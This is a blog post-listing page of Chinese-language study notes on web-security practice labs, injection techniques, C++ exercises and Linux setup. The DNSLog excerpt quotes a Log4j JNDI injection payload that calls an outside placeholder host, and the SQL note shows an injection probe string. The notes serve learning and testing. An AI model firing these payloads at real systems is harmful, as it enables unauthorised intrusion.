- 博客(34)
- 收藏
- 关注
RSS订阅原创 [NOTE] Web For Pentester靶场练习笔记
[NOTE] Web For Pentester靶场练习笔记文章目录[NOTE] Web For Pentester靶场练习笔记前言Web基础PHP的session管理HTTP认证Web应用指纹识别XSSExample 1Example 2Example 3Example 4Example 5Example 6Example 7Example 8Example 9SQL injectionsExample 1Example 2Example 3Example 4Example 5Example 6Exam
2022-01-08 20:52:42
3084
原创 [NOTE] sqli-labs Adv Injections
[NOTE] sqli-labs Adv Injections文章目录[NOTE] sqli-labs Adv Injections前言Less-21: Cookie injection - base64 encoded-single quotes and parenthesisLess-22: Cookie injection - base64 encoded-single – double quotesLess-23: GET - Error based - strip commentsLess-24
2021-12-20 15:33:19
422
原创 [NOTE] RESTful架构
[NOTE] RESTful架构前言是对RESTful架构的学习笔记学习资料:理解RESTful架构-阮一峰RESTful架构详解-菜鸟教程正文概念RESTRepresentational State Transfer表现层状态转化(表征性状态转移)EST本身并没有创造新的技术、组件或服务,而隐藏在RESTful背后的理念就是使用Web的现有特征和能力,更好地使用现有Web标准中的一些准则和约束。虽然REST本身受Web技术的影响很深,但是理论上REST架构风格并不是绑定在HTT
2021-12-16 21:15:29
279
原创 [NOTE] sqli-labs Basic Challenges
[NOTE] sqli-labs Basic Challenges文章目录[NOTE] sqli-labs Basic Challenges前言Less-1: GET-Error based-Single quotes–StringLess-2: GET-Error based-Intiger basedLess-3: GET-Error based-Single quotes with twist-StringLess-4: GET-Error based-Double Quotes-StringLes
2021-12-10 20:32:47
1987
原创 [NOTE] 关于DNSLog平台的使用
[NOTE] 关于DNSLog平台的使用前言起因是12.09午夜的Log4j核弹级漏洞大家验证漏洞的payload:${jndi:idap://XXXX.dnslog.cn/aa}发现大家用的都是DNSLog,而自己还不太懂这个于是发现自己还是真的菜就赶紧补一波所以说什么时候自己租个服务器DNSLog Platform现如今的DNS解析一般是一个递归+迭代解析的过程:粉->蓝->黄->绿->红其中我们可以自己建立一个红色的服务器,接收记录每次的DNS请求可以
2021-12-10 20:25:19
4415
原创 [NOTE] XPath及其注入
[NOTE] XPath及其注入XPathXPath是一门在XML文档中查找信息的语言这里学习基本知识及相关语法一个加载XML文件,并使用XPath解析和查找元素的例子:<!DOCTYPE html><html><body><script>function loadXMLDoc(dname) { if (window.XMLHttpRequest) { // 加载XML文档-步骤一 xhttp=new XML
2021-12-10 20:21:18
1282
原创 [NOTE] XMLHttpRequest
[NOTE] XMLHttpRequest前言是对浏览器接口 XMLHttpRequest的学习笔记主要是因为最近学习的些安全内容(CSRF等)都涉及到了这个因此来简单学习下很多Web应用认为通过仅使用application/json作为content-type,就可以防御CSRF原因是这种请求仅能通过XHR(XMLHttpRequest)请求生成这样在发出正常请求之前,一个pre-flight request会先发送给服务端若返回的pre-flight response不允许跨源(cr
2021-12-10 20:19:59
532
原创 [NOTE] Windows&Linux常用环境变量
[NOTE] Windows&Linux常用环境变量需要说明下的是,环境变量分系统级和用户级一般来说,系统级的环境变量是每个登录到系统的用户都要读取的系统变量,而用户级的环境变量则是该用户使用系统时加载的环境变量Windowscmd执行set可以查看当前系统设置的所有变量下列变量名大小写不敏感%ALLUSERSPROFILE% : 列出所有用户Profile文件位置。%APPDATA% : 列出应用程序数据的默认存放位置。%CD% : 列出当前目录。%CLIENTNAME
2021-12-10 20:18:49
253
原创 [NOTE] SQL与sqlmap
[NOTE] SQL与sqlmapSQL语法order by对查询结果排序ASC:升序(默认)、DESC:降序SQL注入中多在成功查询之后添加order by i来猜解回显的字段数如XXX/?id=1' order by 3 %23limitselect * from tableName limit i,ntableName:表名i:查询结果的索引值(默认从0开始),当i=0时可省略in:查询结果返回的数量i与n之间使用英文逗号","隔开例查询10条数据,索引从0到9,第
2021-12-10 20:17:47
1360
原创 [NOTE] SQLite基础及注入相关
[NOTE] SQLite基础及注入相关前言啊,好多不会,学不完啊一些参考资料:官方文档SQLite的sqlite_master表sqlite3的sqlite_master表探究SQLite手工注入方法小结菜鸟教程sqlite_master只读表,无法使用UPDATE、INSERT或DELETE改写但是会随其他表或索引的变动而自动更新一般要看当前(?)数据库中表的信息,就在这里看结构:CREATE TABLE sqlite_master ( type text, na
2021-12-10 20:14:57
1535
原创 [NOTE] Linux环境变量
[NOTE] Linux环境变量前言学,以前一直没会资料1资料2概述Linux环境变量包括:系统级、用户级系统级环境变量:每个登录到系统的用户都要读取的用户级环境变量:用户使用系统时加载的相关命令export:设置或显示环境变量source:当前shell下读取并执行指定文件中的命令alias:设置或显示命令别名、简写读取set:查看当前系统设置的所有系统变量export:和上面那个一样,但是少了点echo ${变量名}:查看变量值一些变量使用:作为分隔符加载顺序系统变
2021-12-10 20:13:27
297
原创 [NOTE] XVWA靶场练习笔记
[NOTE] XVWA靶场练习笔记文章目录[NOTE] XVWA靶场练习笔记前言SQL Injection – Error Based选择框搜索栏SQL Injection – BlindOS Command InjectionXPATH InjectionCSV Formula InjectionPHP Object InjectionUnrestricted File UploadCross Site Scripting (XSS) – ReflectedCross Site Scripting (X
2021-12-04 21:19:11
1222
原创 [NOTE] DSVW靶场练习笔记
[NOTE] DSVW靶场练习笔记前言是针对DSVW靶场的练习笔记是在搞完Pikachu靶场之后在整理vulnstack的Web安全入门进阶靶场时发现的里面版本比较老,就单独搞出来玩玩最新版本v0.2b用Python 3运行代码很顶,只有不到100行的代码最后学习一下代码环境:Kali Linux 2021.2 x64 | Python 3.9.2由于也接触过几个Web靶场了,有些常见漏洞点就不太提及了各漏洞点后面的info,都来自于OWASP Web安全测试指引(WSTG)但是靶场
2021-12-02 20:46:22
2756
原创 Python装饰器学习笔记
Python装饰器文章目录Python装饰器基本概念从零开始的逐步分析修饰后的问题向被包装后的函数传递参数使用场景:stdout日志接受参数的装饰器作为一个类的装饰器总结学习资料:Python 函数装饰器装饰器类Python __call__()方法(详解版)基本概念先建立一个观点:函数本质上是一个对象,可以赋值给其他变量加上()后就变成执行函数本身,并获得其返回值修改其他函数功能的函数,即是装饰器因为它要修改其他函数,所以装饰器本身应该返回一个函数从而将这个修改后的函数赋值给原
2021-12-02 20:35:09
470
原创 [NOTE] Pikachu靶场练习笔记
[NOTE] Pikachu靶场练习笔记文章目录[NOTE] Pikachu靶场练习笔记前言暴力破解基于表单的暴力破解验证码绕过(on server)验证码绕过(on client)token防爆破Burp Suite第一种方法第二种方法两种方法比较自写脚本Cross Site Scripting概述攻击者端cookie搜集信息钓鱼键盘记录反射型XSS(GET)反射型XSS(POST)存储型XSSDOM型XSSDOM型XSS-XXSS之盲打XSS之过滤XSS之htmlspecialcharsXSS之hre
2021-11-28 15:48:24
2986
原创 [NOTE] WebGoat v8.2.2学习笔记
[NOTE] WebGoat文章目录[NOTE] WebGoat前言CIA常见编码形式OpenSSL使用docker安全SQL安全SQLiSQL特殊字符UNION&JOINS一个盲注payload&BP爆破SQLi防御预编译存储过程最小特权原则预编译的问题路径遍历认证失效JWTBASE64 URL一些风险点JWT签名密钥爆破Token的使用Tom&Jerry的题JWT使用注意事项密码重置账户信息输出安全问题密码重置链接安全密码敏感信息泄露XXE分类基本例子第一道题目代码审计找XXE
2021-10-21 15:08:40
4117
原创 DVWA-暴力破解-对‘g0tmi1k’文章的学习笔记
DVWA-暴力破解-对‘g0tmi1k’文章的学习笔记概要事先准备(Linux命令学习)思想及相关概念解题过程HydraPatatorBurp Suite自写脚本g0tmi1k的原文地址博主g0tmi1k(我叫他“搞牛奶”)的这篇文章是在学习DVWA暴力破解模块时接触到的,一路看下来发现不仅仅只有关于DVWA的解题步骤,还有很多非常值得初学者学习的其他思路和方法,于是就对这篇文章深入学习一下,记下一些个人觉得非常不错的要点。该博主的其他博文也非常优秀,是一位大神!因为我还是个小白,还有很多东西都不会,
2021-04-18 11:05:54
341
原创 常见网络命令介绍及使用
常见网络命令介绍及使用ping介绍参数说明使用例子ipconfig介绍参数说明使用例子tracert介绍参数说明使用例子netstat介绍参数说明使用例子route介绍参数说明使用例子大学在读期间撰写的《计算机网络实验》课程实验报告的摘录与整理。实验环境:网络:局域网、互联网操作系统:Windows Server 2003、Windows 10ping介绍Ping是测试网络联接状况以及信息包发送和接收状况非常有用的工具。Ping向目标主机(地址)发送一个32 字节的IP 数据报到目标站点的主机
2021-02-14 21:43:52
2179
原创 TCP/IP协议配置
TCP/IP协议配置TCP/IP协议配置IP地址子网掩码默认网关DNS服务器以Windows Server 2003为例,简单介绍TCP/IP协议配置各编辑项的内容TCP/IP协议配置TCP/IP(Transmission Control Protocol/InternetProtocol,传输控制协议/网际协议)是指能够在多个不同网络间实现信息传输的协议簇。TCP/IP协议不仅仅指的是TCP和IP两个协议,而是指一个由FTP、SMTP、TCP、UDP、IP等协议构成的协议簇,只是因为在TCP
2021-02-09 20:26:48
5436
原创 多重继承与虚继承编程实验
多重继承与虚继承编程实验基本知识多重继承多重继承下的类作用域虚继承构造函数与虚继承关于本程序示例代码Animal_virtual_baseVers.hvirt-inherit.cpp运行结果本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识多重继承多重继承在概念上比
2021-02-01 22:35:34
356
原创 重载和引用函数编程实验
重载和引用函数编程实验基本知识左值与右值右值引用右值引用和成员函数关于该程序(重载和引用函数)示例代码本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识左值与右值在C语言里,一般而言,左值可以用于赋值语句的左侧,而右值不能。但是在C++中,对于左值和右值的概念可以做
2021-02-01 22:27:30
115
原创 拷贝构造函数编程实验
拷贝构造函数编程实验基本知识拷贝控制函数拷贝构造函数析构函数关于本实验示例代码lab12_1.cpplab12_2.cpplab12_3.cpplab12_4.cpplab12_5.cpp本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识拷贝控制函数当定义一个类时,
2021-02-01 21:58:01
460
原创 类编程实验
类编程实验基本知识基类、派生类和继承虚函数与动态绑定抽象基类与纯虚函数派生类的构造函数指向基类或派生类的指针的转换关于示例程序示例代码Quote.hQuote.cppBasket.hBasket.cppBasket_main.cpp运行结果本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请
2021-02-01 21:44:16
189
原创 类模板编程实验
类模板编程实验基本知识类模板类模板的成员函数类模板的友元运算符的重载重载运算符的调用重载运算符与类的成员函数示例代码Blob.huseBlob.cpp运行结果本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识类模板类模板与函数模板类似,用于生成类的蓝图。与函数模板不
2021-01-30 21:47:21
449
原创 函数模板编程实验
函数模板编程实验基本知识函数模板实例化函数模板关于示例程序示例源代码运行结果本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识函数模板当我们希望一个函数可以对多种不同的类型都执行相类似的操作时,我们可以通过定义一个通用的函数模板,而不是为每个类型都定义一个新的函数。
2021-01-30 21:36:22
317
原创 文本查询编程实验
文本查询编程实验设计思路文本查询程序数据结构代码细节源代码TextQuery.hTextQuery.cppQueryResult.hmake_plural.hquerymain.cpp本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。设计思路文本查询程序该程序要求用户在一个
2021-01-30 21:25:44
365
原创 allocator类编程实验
allocator类编程实验基本知识allocatoruninitialized_copy、uninitialized_fill等函数示例程序示例代码usealloc.cppusealloc2.cpp本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识allocator
2021-01-24 17:08:29
147
原创 weak_ptr指针编程实验
weak_ptr指针编程实验基本知识weak_ptr改进后的StrBlob类示例代码my_StrBlob.hmain.cpp运行结果本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识weak_ptrweak_ptr是一种不控制所指向对象生存期的智能指针,它指向由一个
2021-01-24 12:08:24
156
原创 unique_ptr编程
unique_ptr编程基本知识unique_ptr动态数组智能指针与动态数组示例代码本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识unique_ptr与shared_ptr不同的是,某个时刻只能有一个unique_ptr指向一个给定的对象。当unique_pt
2021-01-24 11:22:11
179
原创 共享智能指针编程实验
共享智能指针编程实验基本知识shared_ptr与make_sharedinitializer_list自定义的StrBlob类const限定符示例代码my_StrBlob.hmain.cpp运行结果本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。基本知识shared_pt
2021-01-24 11:08:58
125
原创 动态内存的基本功能和使用
动态内存的基本功能和使用基本知识动态内存new和deleteshared_ptrStrBlob类与StrBlobPtr类示例代码程序1程序2程序3本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。本文涉及到的三个程序通过自定义了一个结构体Foo、类型StrBlob、指向其的类型
2021-01-23 21:28:43
628
原创 Kali Linux ver2020.4安装Google中文输入法以及nslookup、dig等工具
Kali Linux ver2020.4安装Google中文输入法以及nslookup、dig等工具安装谷歌中文输入法准备安装安装nslookup、dig等工具些许感悟安装谷歌中文输入法准备添加下载源终端执行:sudo vi /etc/apt/sources.list(输入当前用户密码)添加以下镜像源:#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mir
2021-01-21 22:34:23
779
2
原创 标准库类型string的基本功能和使用
标准库类型string的基本功能和使用String基本知识初始化基本操作范围for语句string定义的迭代器及其他关于下标操作示例代码练习3.6cctype.cpppunctRemove.cppchar_repl.cpp本文是本人大一期间在校学习C++课程时所撰写的实验报告的摘录,由于刚上大学,刚接触计算机编程方面的相关知识,故可能会有很多不足甚至错误的地方,还请各位看官指出及纠正。本文所涉及到的“教材”指:电子工业出版社《C++ Primary中文版(第5版)》如需转载或引用请标明出处。Str
2021-01-20 09:35:45
448
原创 多个Activity与Fragment之间的数据传递
多个Activity与Fragment之间数据传递问题描述解决思路具体解决bug de到亲妈落泪。问题描述首先展示个人问题的整体框架:ActivityA:主页面,有一个PageView控件放有多个Fragment;存在一个按钮可以启动ActivityB。ActivityB:存在按钮可以启动ActivityC。ActivityC:填写表单,要求返回数据到ActivityA的某个Fragment。当前的问题就是:如何从ActivityA依次启动Activity,最后在ActivityA中的F
2020-12-06 21:03:11
405
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人